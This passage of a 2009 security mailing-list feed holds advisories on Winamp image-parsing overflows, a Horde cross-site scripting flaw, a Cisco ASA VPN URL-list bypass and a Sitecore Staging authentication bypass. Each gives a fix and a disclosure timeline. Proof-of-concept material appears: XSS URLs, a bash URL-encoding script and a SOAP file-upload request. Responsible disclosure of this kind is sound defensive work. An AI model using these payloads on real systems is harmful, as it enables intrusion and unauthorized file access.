	<title>VUPEN Security Research - Winamp PNG and JPEG Data Integer Overflow Vulnerabilities</title>
	<published>2009-12-17T07:53:44Z</published>
	<updated>2009-12-17T07:53:44Z</updated>
	<author>
		<name>VUPEN Security Research</name>
	</author>
	<content type="html">VUPEN Security Research - Winamp PNG and JPEG Data Integer Overflow 
&lt;br&gt;Vulnerabilities
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.vupen.com/english/research.php&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.vupen.com/english/research.php&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;I. BACKGROUND
&lt;br&gt;--------------------- 
&lt;br&gt;&lt;br&gt;Winamp is a proprietary media player written by Nullsoft,
&lt;br&gt;now a subsidiary of AOL. It is skinnable, multi-format
&lt;br&gt;freeware/shareware (from Wikipedia).
&lt;br&gt;&lt;br&gt;Winamp is a one of the world's most popular media players
&lt;br&gt;with over 73 million users globally (comScore Media Metrix,
&lt;br&gt;January 2009).
&lt;br&gt;&lt;br&gt;&lt;br&gt;II. DESCRIPTION
&lt;br&gt;--------------------- 
&lt;br&gt;&lt;br&gt;VUPEN Vulnerability Research Team discovered critical
&lt;br&gt;vulnerabilities affecting Winamp.
&lt;br&gt;&lt;br&gt;These vulnerabilities are caused due to integer overflow errors within
&lt;br&gt;the &amp;quot;jpeg.w5s&amp;quot; and &amp;quot;png.w5s&amp;quot; filters when processing malformed
&lt;br&gt;JPEG or PNG data in a media (e.g. MP3) file, which could allow
&lt;br&gt;attackers to execute arbitrary code by tricking a user into opening
&lt;br&gt;a specially crafted MP3.
&lt;br&gt;&lt;br&gt;&lt;br&gt;III. AFFECTED PRODUCTS
&lt;br&gt;--------------------------------
&lt;br&gt;&lt;br&gt;Winamp version 5.56 and prior
&lt;br&gt;&lt;br&gt;&lt;br&gt;IV. Exploits - PoCs &amp; Binary Analysis
&lt;br&gt;----------------------------------------
&lt;br&gt;&lt;br&gt;In-depth binary analysis of the vulnerabilities and proof-of-concept
&lt;br&gt;codes have been released by VUPEN Security through the
&lt;br&gt;VUPEN Exploits &amp; PoCs Service :
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.vupen.com/exploits&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.vupen.com/exploits&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;V. SOLUTION
&lt;br&gt;---------------- 
&lt;br&gt;&lt;br&gt;Upgrade to Winamp version 5.57 :
&lt;br&gt;&lt;a href=&quot;http://www.winamp.com/media-player&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.winamp.com/media-player&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;VI. CREDIT
&lt;br&gt;-------------- 
&lt;br&gt;The vulnerabilities were discovered by Nicolas JOLY of VUPEN Security
&lt;br&gt;&lt;br&gt;&lt;br&gt;VII. REFERENCES
&lt;br&gt;----------------------
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.vupen.com/english/advisories/2009/3576&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.vupen.com/english/advisories/2009/3576&lt;/a&gt;&lt;br&gt;&lt;a href=&quot;http://forums.winamp.com/showthread.php?threadid=315355&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://forums.winamp.com/showthread.php?threadid=315355&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;VIII. DISCLOSURE TIMELINE
&lt;br&gt;----------------------------------- 
&lt;br&gt;&lt;br&gt;2009-11-25 - Vendor notified
&lt;br&gt;2009-11-25 - Vendor response
&lt;br&gt;2009-12-02 - Status update received
&lt;br&gt;2009-12-17 - Coordinated public Disclosure
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/VUPEN-Security-Research---Winamp-PNG-and-JPEG-Data-Integer-Overflow-Vulnerabilities-tp26831720p26831720.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26830500</id>
	<title>[ISecAuditors Security Advisories] Horde 3.3.5 &quot;PHP_SELF&quot; Cross-Site Scripting vulnerability</title>
	<published>2009-12-17T07:39:01Z</published>
	<updated>2009-12-17T07:39:01Z</updated>
	<author>
		<name>ISecAuditors Security Advisories</name>
	</author>
	<content type="html">=============================================
&lt;br&gt;INTERNET SECURITY AUDITORS ALERT 2009-012
&lt;br&gt;- Original release date: October 13th, 2009
&lt;br&gt;- Last revised: December 16th, 2009
&lt;br&gt;- Discovered by: Juan Galiana Lara
&lt;br&gt;- CVE ID: CVE-2009-3701
&lt;br&gt;- Severity: 6.3/10 (CVSS Base Score)
&lt;br&gt;=============================================
&lt;br&gt;&lt;br&gt;I. VULNERABILITY
&lt;br&gt;-------------------------
&lt;br&gt;Horde 3.3.5 &amp;quot;PHP_SELF&amp;quot; Cross-Site Scripting vulnerability
&lt;br&gt;&lt;br&gt;II. BACKGROUND
&lt;br&gt;-------------------------
&lt;br&gt;The Horde Application Framework is a modular, general-purpose web
&lt;br&gt;application framework written in PHP. &amp;nbsp;It provides an extensive array
&lt;br&gt;of classes that are targeted at the common problems and tasks involved
&lt;br&gt;in developing modern web applications.
&lt;br&gt;&lt;br&gt;III. DESCRIPTION
&lt;br&gt;-------------------------
&lt;br&gt;Input passed to 'PHP_SELF' variable is not properly filtered before
&lt;br&gt;being returned to the user. This can be explotied to inject arbitrary
&lt;br&gt;HTML or to execute arbitrary script code in a user's browser session
&lt;br&gt;in context of an affected site. In order to successfully exploit this
&lt;br&gt;vulnerability the targeted user has to be logged as an administrator.
&lt;br&gt;&lt;br&gt;horde-3.3.5/admin/cmdshell.php:46:&amp;lt;form action=&amp;quot;&amp;lt;?php echo
&lt;br&gt;$_SERVER['PHP_SELF'] ?&amp;gt;&amp;quot; method=&amp;quot;post&amp;quot;&amp;gt;
&lt;br&gt;horde-3.3.5/admin/sqlshell.php:29:&amp;lt;form name=&amp;quot;sqlshell&amp;quot; action=&amp;quot;&amp;lt;?php
&lt;br&gt;echo $_SERVER['PHP_SELF'] ?&amp;gt;&amp;quot; method=&amp;quot;post&amp;quot;&amp;gt;
&lt;br&gt;horde-3.3.5/admin/phpshell.php:42:&amp;lt;form action=&amp;quot;&amp;lt;?php echo
&lt;br&gt;$_SERVER['PHP_SELF'] ?&amp;gt;&amp;quot; method=&amp;quot;post&amp;quot;&amp;gt;
&lt;br&gt;&lt;br&gt;In order to filter the &amp;quot;PHP_SELF&amp;quot; variable, the htmlspecialchars
&lt;br&gt;function has to be used, like in
&lt;br&gt;'horde-3.3.5/templates/shares/edit.inc' file:
&lt;br&gt;&lt;br&gt;horde-3.3.5/templates/shares/edit.inc:1:&amp;lt;form name=&amp;quot;edit&amp;quot;
&lt;br&gt;method=&amp;quot;post&amp;quot; action=&amp;quot;&amp;lt;?php echo
&lt;br&gt;htmlspecialchars($_SERVER['PHP_SELF']) ?&amp;gt;&amp;quot;&amp;gt;
&lt;br&gt;&lt;br&gt;IV. PROOF OF CONCEPT
&lt;br&gt;-------------------------
&lt;br&gt;This PoC will show an alert with the text &amp;quot;xss&amp;quot;
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://site/horde-3.3.5/admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://site/horde-3.3.5/admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=&lt;/a&gt;&amp;lt;sessid&amp;gt;
&lt;br&gt;&lt;a href=&quot;http://site/horde-3.3.5/admin/cmdshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://site/horde-3.3.5/admin/cmdshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=&lt;/a&gt;&amp;lt;sessid&amp;gt;
&lt;br&gt;&lt;a href=&quot;http://site/horde-3.3.5/admin/sqlshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://site/horde-3.3.5/admin/sqlshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=&lt;/a&gt;&amp;lt;sessid&amp;gt;
&lt;br&gt;&lt;br&gt;V. BUSINESS IMPACT
&lt;br&gt;-------------------------
&lt;br&gt;Is possible to execute arbitrary HTML or script code in a targeted
&lt;br&gt;user's browser. Only works with administration sessions.
&lt;br&gt;&lt;br&gt;VI. SYSTEMS AFFECTED
&lt;br&gt;-------------------------
&lt;br&gt;Horde 3.3.5 is vulnerable, others may be affected.
&lt;br&gt;&lt;br&gt;VII. SOLUTION
&lt;br&gt;-------------------------
&lt;br&gt;Upgrade to version 3.3.6
&lt;br&gt;&lt;br&gt;VIII. REFERENCES
&lt;br&gt;-------------------------
&lt;br&gt;&lt;a href=&quot;http://www.horde.org&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.horde.org&lt;/a&gt;&lt;br&gt;&lt;a href=&quot;http://lists.horde.org/archives/announce/2009/000529.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://lists.horde.org/archives/announce/2009/000529.html&lt;/a&gt;&lt;br&gt;&lt;a href=&quot;http://www.isecauditors.com&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.isecauditors.com&lt;/a&gt;&lt;br&gt;&lt;br&gt;IX. CREDITS
&lt;br&gt;-------------------------
&lt;br&gt;This vulnerability has been discovered by
&lt;br&gt;Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).
&lt;br&gt;&lt;br&gt;X. REVISION HISTORY
&lt;br&gt;-------------------------
&lt;br&gt;October &amp;nbsp; 13, 2009: Initial release
&lt;br&gt;October &amp;nbsp; 19, 2009: Added CVE id.
&lt;br&gt;December &amp;nbsp;13, 2009: Revision.
&lt;br&gt;December &amp;nbsp;16, 2009: Las revision.
&lt;br&gt;&lt;br&gt;XI. DISCLOSURE TIMELINE
&lt;br&gt;-------------------------
&lt;br&gt;October &amp;nbsp; 13, 2009: Vulnerability discovered by
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Internet Security Auditors.
&lt;br&gt;October &amp;nbsp; 13, 2009: Sent to developers.
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; The issue is considered hard to exploit and
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; solution is delayed.
&lt;br&gt;December &amp;nbsp;13, 2009: Second contact for correction plan.
&lt;br&gt;December &amp;nbsp;15, 2009: New release published.
&lt;br&gt;December &amp;nbsp;16, 2009: Sent to public lists.
&lt;br&gt;&lt;br&gt;XII. LEGAL NOTICES
&lt;br&gt;-------------------------
&lt;br&gt;The information contained within this advisory is supplied &amp;quot;as-is&amp;quot;
&lt;br&gt;with no warranties or guarantees of fitness of use or otherwise.
&lt;br&gt;Internet Security Auditors accepts no responsibility for any damage
&lt;br&gt;caused by the use or misuse of this information.
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/-ISecAuditors-Security-Advisories--Horde-3.3.5-%22PHP_SELF%22-Cross-Site-Scripting-vulnerability-tp26830500p26830500.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26830203</id>
	<title>[ISecAuditors Security Advisories] Cisco ASA &lt;= 8.x VPN SSL module Clientless URL-list control bypass</title>
	<published>2009-12-17T04:48:41Z</published>
	<updated>2009-12-17T04:48:41Z</updated>
	<author>
		<name>ISecAuditors Security Advisories</name>
	</author>
	<content type="html">=============================================
&lt;br&gt;INTERNET SECURITY AUDITORS ALERT 2009-013
&lt;br&gt;- Original release date: December 7th, 2009
&lt;br&gt;- Last revised: December 16th, 2009
&lt;br&gt;- Discovered by: David Eduardo Acosta Rodriguez
&lt;br&gt;- Severity: 4/10 (CVSS Base Score)
&lt;br&gt;=============================================
&lt;br&gt;&lt;br&gt;I. VULNERABILITY
&lt;br&gt;-------------------------
&lt;br&gt;Cisco ASA &amp;lt;= 8.x VPN SSL module Clientless URL-list control bypass
&lt;br&gt;&lt;br&gt;II. BACKGROUND
&lt;br&gt;-------------------------
&lt;br&gt;Cisco VPN SSL [1] is a module for Cisco ASA and Cisco Integrated
&lt;br&gt;Services Routers to extend network resources to virtually any remote
&lt;br&gt;user with access to the Internet and a web browser.
&lt;br&gt;&lt;br&gt;III. DESCRIPTION
&lt;br&gt;-------------------------
&lt;br&gt;Cisco VPN SSL Clientless lets administrators define rules to specific
&lt;br&gt;targets within the private network that WebVPN users will be able to
&lt;br&gt;access. This specific targets are published using links in VPN SSL
&lt;br&gt;home page. These links (URL) are protected (obfuscated) using a ROT13
&lt;br&gt;substitution[2] and converting ASCII characters to hexadecimal. An
&lt;br&gt;user with a valid account and without &amp;quot;URL entry&amp;quot; can access any
&lt;br&gt;internal/external resource simply taken an URL, encrypt with ROT 13,
&lt;br&gt;convert ASCII characters to hexadecimal and appending this string to
&lt;br&gt;Cisco VPN SSL URL.
&lt;br&gt;&lt;br&gt;IV. PROOF OF CONCEPT
&lt;br&gt;-------------------------
&lt;br&gt;Using URL &lt;a href=&quot;http://intranet&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://intranet&lt;/a&gt;&amp;nbsp;published on internal server (not accessible
&lt;br&gt;from home page):
&lt;br&gt;1. Convert string to ROT13: uggc://vagenarg
&lt;br&gt;2. Change ASCII chars to HEX: 756767633a2f2f766167656e617267
&lt;br&gt;3. Append string to Cisco VPN SSL:
&lt;br&gt;https://[CISCOVPNSSL]/+CSCO+00756767633a2f2f766167656e617267++
&lt;br&gt;&lt;br&gt;This is a simple PoC for easy demonstration:
&lt;br&gt;&lt;br&gt;#!/bin/bash
&lt;br&gt;echo -n &amp;quot;write URL:&amp;quot;
&lt;br&gt;read a
&lt;br&gt;b=`echo -n $a | tr '[a-m][n-z][A-M][N-Z]' '[n-z][a-m][N-Z][A-M]' | od
&lt;br&gt;-tx1 | cut &amp;nbsp;-c8- | sed 's/ //g'` | paste -s -d '';
&lt;br&gt;echo -n &amp;quot;URL &amp;quot;
&lt;br&gt;echo -n &amp;quot;https://[CISCOVPNSSL]/+CSCO+00&amp;quot;; echo -n $b; echo -n &amp;quot;++&amp;quot;;
&lt;br&gt;echo &amp;quot;&amp;quot;;
&lt;br&gt;&lt;br&gt;V. BUSINESS IMPACT
&lt;br&gt;-------------------------
&lt;br&gt;Users with valid account can surf to internal/external resources,
&lt;br&gt;bypassing controls in home page.
&lt;br&gt;&lt;br&gt;VI. SYSTEMS AFFECTED
&lt;br&gt;-------------------------
&lt;br&gt;Cisco ASA &amp;lt;= 8.x are vulnerable.
&lt;br&gt;&lt;br&gt;VII. SOLUTION
&lt;br&gt;-------------------------
&lt;br&gt;Always set &amp;quot;webtype&amp;quot; ACL and &amp;quot;filter&amp;quot; to block access in Web VPN SSL
&lt;br&gt;(not activated by default). Included in Cisco site now.
&lt;br&gt;Follow recommendations from &amp;quot;Cisco Understanding Features Not
&lt;br&gt;Supported in Clientless SSL VPN&amp;quot; [3].
&lt;br&gt;&lt;br&gt;VIII. REFERENCES
&lt;br&gt;-------------------------
&lt;br&gt;[1] www.cisco.com/web/go/sslvpn
&lt;br&gt;[2] &lt;a href=&quot;http://en.wikipedia.org/wiki/ROT13&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://en.wikipedia.org/wiki/ROT13&lt;/a&gt;&lt;br&gt;[3] &lt;a href=&quot;http://www.cisco.com/en/US/docs/security/asa/asa82/configuration/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/en/US/docs/security/asa/asa82/configuration/&lt;/a&gt;&lt;br&gt;guide/webvpn.html#wp999589
&lt;br&gt;&lt;a href=&quot;http://tools.cisco.com/security/center/viewAlert.x?alertId=19609&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://tools.cisco.com/security/center/viewAlert.x?alertId=19609&lt;/a&gt;&lt;br&gt;&lt;a href=&quot;http://www.isecauditors.com&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.isecauditors.com&lt;/a&gt;&lt;br&gt;&lt;br&gt;IX. CREDITS
&lt;br&gt;-------------------------
&lt;br&gt;This vulnerability has been discovered by
&lt;br&gt;David Eduardo Acosta Rodríguez (deacosta (at) isecauditors (dot) com,
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; dacosta (at) computer (dot) org).
&lt;br&gt;Thanks to Juan Galiana Lara (jgaliana (at) isecauditors (dot) com))
&lt;br&gt;for additional research.
&lt;br&gt;&lt;br&gt;X. REVISION HISTORY
&lt;br&gt;-------------------------
&lt;br&gt;December &amp;nbsp; 7, 2009: Initial release.
&lt;br&gt;December &amp;nbsp;16, 2009: Last revision.
&lt;br&gt;&lt;br&gt;XI. DISCLOSURE TIMELINE
&lt;br&gt;-------------------------
&lt;br&gt;December &amp;nbsp; 9, 2009: Vendor contacted
&lt;br&gt;December &amp;nbsp; 9, 2009: Vendor response, they include our mitigation
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; proposal in their website and start the analysis
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; of correction required.
&lt;br&gt;December &amp;nbsp;16, 2009: Vendor confirms remediation and public statement.
&lt;br&gt;December &amp;nbsp;17, 2009: Sent to lists.
&lt;br&gt;&lt;br&gt;XII. LEGAL NOTICES
&lt;br&gt;-------------------------
&lt;br&gt;The information contained within this advisory is supplied &amp;quot;as-is&amp;quot;
&lt;br&gt;with no warranties or guarantees of fitness of use or otherwise.
&lt;br&gt;Internet Security Auditors accepts no responsibility for any damage
&lt;br&gt;caused by the use or misuse of this information.
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/-ISecAuditors-Security-Advisories--Cisco-ASA-%3C%3D-8.x-VPN-SSL-module-Clientless-URL-list-control-bypass-tp26830203p26830203.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26829953</id>
	<title>SEC Consult SA-20091217-0 :: Authentication bypass and file manipulation in Sitecore Staging Module</title>
	<published>2009-12-17T04:17:56Z</published>
	<updated>2009-12-17T04:17:56Z</updated>
	<author>
		<name>Bernhard Mueller</name>
	</author>
	<content type="html">SEC Consult Security Advisory &amp;lt; 20091217-0 &amp;gt;
&lt;br&gt;==========================================================================
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;title: Authentication bypass and file manipulation in 
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Sitecore Staging Module
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; products: Sitecore Staging Module
&lt;br&gt;vulnerable version: Sitecore Staging Module &amp;lt;= 5.4.0 rev.080625
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;fixed version: Staging 5.4.0 rev.091111 
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; impact: critical
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; homepage:
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://www.sitecore.net/en/Products/Sitecore-CMS.aspx&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.sitecore.net/en/Products/Sitecore-CMS.aspx&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;found: 2009-09-07
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; by: L. Weichselbaum / SEC Consult / www.sec-consult.com
&lt;br&gt;==========================================================================
&lt;br&gt;&lt;br&gt;Vendor description:
&lt;br&gt;-------------------
&lt;br&gt;Sitecore CMS makes it effortless to create content and experience rich
&lt;br&gt;websites that help you achieve your business goals such as increasing 
&lt;br&gt;sales and search engine visibility, while being straight-forward to &amp;nbsp;
&lt;br&gt;integrate and administer. Sitecore lets you deliver sites that are
&lt;br&gt;highly scalable, robust and secure. Whether you're focused on
&lt;br&gt;marketing, development and design, or providing site content, Sitecore
&lt;br&gt;delivers for you.
&lt;br&gt;&lt;br&gt;The main purpose of the Sitecore Staging module is to update two or
&lt;br&gt;more Sitecore installations across a firewall. 
&lt;br&gt;&lt;br&gt;source: &lt;a href=&quot;http://www.sitecore.net/en/Products.aspx&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.sitecore.net/en/Products.aspx&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://sdn.sitecore.net/upload/sdn5/sitecore6modules/staging/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://sdn.sitecore.net/upload/sdn5/sitecore6modules/staging/&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; staging-module-installation-and-configuration-guide.pdf
&lt;br&gt;&lt;br&gt;&lt;br&gt;Vulnerability overview/description:
&lt;br&gt;-----------------------------------
&lt;br&gt;The Staging Webservice (normally found in &amp;quot;/sitecore modules/staging/
&lt;br&gt;service/api.asmx&amp;quot;) used for transmitting files between the Sitecore
&lt;br&gt;Master and Slave Server is vulnerable to authentication bypass and
&lt;br&gt;therefore
&lt;br&gt;* files can be uploaded in arbitrary directories on the server
&lt;br&gt;* files can be downloaded from arbitrary directories on the server
&lt;br&gt;* directory listings of the whole server can be received
&lt;br&gt;* the webserver cache can be deleted 
&lt;br&gt;&lt;br&gt;An attacker is able to upload a shell, modify or delete sensitive data
&lt;br&gt;or gain the whole source code of the application. Furthermore it is
&lt;br&gt;possible to retrieve directory listings of directories of the whole
&lt;br&gt;server and the webroot. All these actions are performed with the rights
&lt;br&gt;of the webserver user. One tested server allowed us to compromise the
&lt;br&gt;whole server by uploading a shell into the webroot.
&lt;br&gt;&lt;br&gt;&lt;br&gt;Proof of concept:
&lt;br&gt;-----------------
&lt;br&gt;Authentication bypass and file manipulation
&lt;br&gt;===========================================
&lt;br&gt;To exploit this vulnerability, the example of &amp;quot;api.asmx?op=Upload&amp;quot; can
&lt;br&gt;be used in a slightly modified form. The parameters &amp;quot;Username&amp;quot; and
&lt;br&gt;&amp;quot;Password&amp;quot; can be set at random, but they must not be empty. The
&lt;br&gt;parameter &amp;quot;File&amp;quot; contains the base64 encoded content of the file which
&lt;br&gt;should be uploaded. For the parameters &amp;quot;append&amp;quot; and &amp;quot;isEncrypted&amp;quot; the
&lt;br&gt;value &amp;quot;false&amp;quot; is most suitable. In &amp;quot;Destination&amp;quot; the location of the
&lt;br&gt;file on the remote system can be specified. The following POST-request
&lt;br&gt;creates a file named test.txt in C:\temp. It would also be possible to
&lt;br&gt;upload a shell into the Webroot.
&lt;br&gt;&lt;br&gt;POST /sitecore%20modules/staging/service/api.asmx HTTP/1.1
&lt;br&gt;Host: hostToExploit
&lt;br&gt;Content-Type: application/soap+xml; charset=utf-8
&lt;br&gt;Content-Length: 599
&lt;br&gt;&lt;br&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;
&lt;br&gt;&amp;lt;soap12:Envelope xmlns:xsi=&amp;quot;&lt;a href=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.w3.org/2001/XMLSchema-instance&lt;/a&gt;&amp;quot; 
&lt;br&gt;xmlns:xsd=&amp;quot;&lt;a href=&quot;http://www.w3.org/2001/XMLSchema&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.w3.org/2001/XMLSchema&lt;/a&gt;&amp;quot; 
&lt;br&gt;xmlns:soap12=&amp;quot;&lt;a href=&quot;http://www.w3.org/2003/05/soap-envelope&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.w3.org/2003/05/soap-envelope&lt;/a&gt;&amp;quot;&amp;gt;
&lt;br&gt;&amp;nbsp; &amp;lt;soap12:Body&amp;gt;
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;lt;Upload xmlns=&amp;quot;&lt;a href=&quot;http://Sitecore/modules/Staging/API/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://Sitecore/modules/Staging/API/&lt;/a&gt;&amp;quot;&amp;gt;
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; [Soap-Stuff]
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;lt;/Upload&amp;gt;
&lt;br&gt;&amp;nbsp; &amp;lt;/soap12:Body&amp;gt;
&lt;br&gt;&amp;lt;/soap12:Envelope&amp;gt;
&lt;br&gt;&lt;br&gt;The same applies to the webservice operations &amp;quot;Download&amp;quot;, &amp;quot;List&amp;quot; and 
&lt;br&gt;&amp;quot;Clear Cache&amp;quot;.
&lt;br&gt;&lt;br&gt;&lt;br&gt;Vulnerable versions:
&lt;br&gt;--------------------
&lt;br&gt;Sitecore Staging Module &amp;nbsp;
&lt;br&gt;* &amp;lt;= v5.4.0 rev.080625
&lt;br&gt;&lt;br&gt;Vendor contact timeline:
&lt;br&gt;------------------------
&lt;br&gt;2009-10-09: Contacting Sitecore.
&lt;br&gt;2009-10-12: Reply from Sitecore.
&lt;br&gt;2009-10-12: Preliminary advisory with full vulnerability details was
&lt;br&gt;sent to Sitecore.
&lt;br&gt;2009-12-02: Requested status of the planned security fixes.
&lt;br&gt;2009-12-03: Reply from Sitecore, fixes are now in second iteration in
&lt;br&gt;their QA department and they expect to release this before Christmas.
&lt;br&gt;2009-12-03: Reply from Sitecore, vulnerabilities have been fixed and
&lt;br&gt;new version has been released.
&lt;br&gt;2009-12-16: Final version of the advisory sent to Sitecore and release 
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; date was scheduled.
&lt;br&gt;2009-12-16: Reply from Sitecore.
&lt;br&gt;2009-12-17: Release of the advisory.
&lt;br&gt;&lt;br&gt;&lt;br&gt;Solution:
&lt;br&gt;---------
&lt;br&gt;Update to Sitecore Staging Module v5.4.0 rev.091111
&lt;br&gt;&lt;br&gt;Workaround:
&lt;br&gt;-----------
&lt;br&gt;Delete the Staging Webservice (normally found in &amp;quot;/sitecore modules/
&lt;br&gt;staging/service/api.asmx&amp;quot;) to prevent arbitrary file manipulation. 
&lt;br&gt;The Sitecore Staging Module can thereby only use FTP for transmitting 
&lt;br&gt;files between the Sitecore Master and Slave with the Sitecore Staging 
&lt;br&gt;Module.
&lt;br&gt;&lt;br&gt;Advisory URL:
&lt;br&gt;-------------
&lt;br&gt;&lt;a href=&quot;https://www.sec-consult.com/advisories_e.html#a63&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;https://www.sec-consult.com/advisories_e.html#a63&lt;/a&gt;&lt;br&gt;&lt;br&gt;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
&lt;br&gt;SEC Consult Unternehmensberatung GmbH
&lt;br&gt;&lt;br&gt;Office Vienna
&lt;br&gt;Mooslackengasse 17
&lt;br&gt;A-1190 Vienna
&lt;br&gt;Austria
&lt;br&gt;&lt;br&gt;Tel.: +43 / 1 / 890 30 43 - 0
&lt;br&gt;Fax.: +43 / 1 / 890 30 43 - 25
&lt;br&gt;Mail: research at sec-consult dot com
&lt;br&gt;www.sec-consult.com
&lt;br&gt;&lt;br&gt;SEC Consult conducts periodical information security workshops on ISO 
&lt;br&gt;27001/BS 7799 in cooperation with BSI Management Systems. For more 
&lt;br&gt;information, please refer to &lt;a href=&quot;https://www.sec-consult.com/academy_e.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;https://www.sec-consult.com/academy_e.html&lt;/a&gt;&lt;br&gt;&lt;br&gt;EOF L. Weichselbaum / @2009
&lt;br&gt;</content>
